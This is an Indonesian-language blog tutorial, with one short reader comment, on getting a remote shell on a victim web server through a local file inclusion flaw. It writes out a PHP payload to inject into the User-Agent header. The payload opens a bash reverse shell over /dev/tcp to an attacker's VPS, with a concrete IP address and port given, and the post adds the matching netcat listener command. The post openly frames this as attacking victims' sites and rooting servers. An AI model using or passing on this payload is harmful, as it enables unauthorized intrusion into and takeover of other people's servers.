Kali ini saya hanya share tutorial ringan mengenai cara mendapatkan remote shell dari LFI exploit. Ini tentu sangat berguna saat kita gagal mengupload backdoor ke web korban atau bahkan akan memudahkan kita saat ingin melakukan rooting server.
Sebelum meneruskan tutorial ini, saya anggap kalian sudah paham dasar dari LFI exploit itu sendiri.
Untuk tutorialnya bisa baca disini :
Hanya saja seperti kasus yang saya alami, kadang kala kita gagal mengupload backdoor ke web target. Akibatnya web gagal di expore.
Nah silahkan lihat ss berikut :
Yup, bash shell dari web target.
Caranya cukup mudah, saat melakukan proses tamper data, user-agent nya isikan command berikut :
<?system('bash -i >& /dev/tcp/ip-vps/port 0>&1');?>
Contoh :
<?system('bash -i >& /dev/tcp/54.179.146.109/1337 0>&1');?>
Nah tentu saja sebelum melakukan tamper data kalian harus mengaktifkan netcat terlebih dahulu.
[root@vps]# nc -l 1337
Dan kalo servernya memang bisa di back connect, kita akan mendapatkan akses shell ke server target di vps kita.
Oke sekian tutorial kali ini, semoga bermanfaat.
Mantap mas